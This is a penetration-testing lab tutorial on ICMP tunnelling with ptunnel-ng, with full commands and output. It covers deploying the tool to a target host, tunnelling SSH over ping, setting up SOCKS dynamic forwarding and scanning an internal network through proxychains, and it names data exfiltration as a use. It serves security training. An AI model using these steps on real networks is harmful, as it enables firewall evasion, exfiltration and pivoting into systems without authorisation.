ICMP Tunneling with SOCKS
ICMP tunneling encapsulates traffic within
ICMP packets containing
echo requests and
responses. ICMP tunneling would only work when ping responses are permitted within a firewalled network. When a host within a firewalled network is allowed to ping an external server, it can encapsulate its traffic within the ping echo request and send it to an external server. The external server can validate this traffic and send an appropriate response, which is extremely useful for data exfiltration and creating pivot tunnels to an external server.
neutron@kali[/kali]$ git clone https://github.com/utoni/ptunnel-ng.git
neutron@kali[/kali]$ sudo ./autogen.sh
After running authgen.sh, ptunnel-ng can be used from the client and server-side. We will now need to transfer the repo from our attack host to the target host.
neutron@kali[/kali]$ scp -r ptunnel-ng [email protected]:~/
Starting the ptunnel-ng Server on the Target Host
ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r10.129.202.64 -R22 [sudo] password for ubuntu: ./ptunnel-ng: /lib/x86_64-linux-gnu/libselinux.so.1: no version information available (required by ./ptunnel-ng) [inf]: Starting ptunnel-ng 1.42. [inf]: (c) 2004-2011 Daniel Stoedle, <[email protected]> [inf]: (c) 2017-2019 Toni Uhlig, <[email protected]> [inf]: Security features by Sebastien Raveau, <[email protected]> [inf]: Forwarding incoming ping packets over TCP. [inf]: Ping proxy is listening in privileged mode. [inf]: Dropping privileges now.
The IP address following
-r should be the IP we want ptunnel-ng to accept connections on. In this case, whatever IP is reachable from our attack host would be what we would use.
We can attempt to connect to the ptunnel-ng server but ensure this happens through local port 2222 (
-l2222). Connecting through local port 2222 allows us to send traffic through the ICMP tunnel.
neutron@kali[/kali]$ sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22 [inf]: Starting ptunnel-ng 1.42. [inf]: (c) 2004-2011 Daniel Stoedle, <[email protected]> [inf]: (c) 2017-2019 Toni Uhlig, <[email protected]> [inf]: Security features by Sebastien Raveau, <[email protected]> [inf]: Relaying packets from incoming TCP streams.
With the ptunnel-ng ICMP tunnel successfully established, we can attempt to connect to the target using SSH through local port 2222 (
neutron@kali[/kali]$ ssh -p2222 -lubuntu 127.0.0.1 [email protected]'s password: Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Wed 11 May 2022 03:10:15 PM UTC System load: 0.0 Usage of /: 39.6% of 13.72GB Memory usage: 37% Swap usage: 0% Processes: 183 Users logged in: 1 IPv4 address for ens192: 10.129.202.64 IPv6 address for ens192: dead:beef::250:56ff:feb9:52eb IPv4 address for ens224: 172.16.5.129 * Super-optimized for small spaces - read how we shrank the memory footprint of MicroK8s to make it the smallest full K8s around. https://ubuntu.com/blog/microk8s-memory-optimisation 144 updates can be applied immediately. 97 of these updates are standard security updates. To see these additional updates run: apt list --upgradable Last login: Wed May 11 14:53:22 2022 from 10.10.14.18 ubuntu@WEB01:~$
On the client & server side of the connection, we will notice ptunnel-ng gives us session logs and traffic statistics associated with the traffic that passes through the ICMP tunnel. This is one way we can confirm that our traffic is passing from client to server utilizing ICMP.
inf]: Incoming tunnel request from 10.10.14.18. [inf]: Starting new session to 10.129.202.64:22 with ID 20199 [inf]: Received session close from remote peer. [inf]: Session statistics: [inf]: I/O: 0.00/ 0.00 mb ICMP I/O/R: 248/ 22/ 0 Loss: 0.0% [inf]:
We may also use this tunnel and SSH to perform dynamic port forwarding to allow us to use proxychains in various ways.
neutron@kali[/kali]$ ssh -D 9050 -p2222 -lubuntu 127.0.0.1 [email protected]'s password: Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64) <snip>
We could use proxychains with Nmap to scan targets on the internal network (172.16.5.x). Based on our discoveries, we can attempt to connect to the target.
neutron@kali[/kali]$ proxychains nmap -sV -sT 172.16.5.19 -p3389 ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-11 11:10 EDT |S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK Nmap scan report for 172.16.5.19 Host is up (0.12s latency). PORT STATE SERVICE VERSION 3389/tcp open ms-wbt-server Microsoft Terminal Services Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds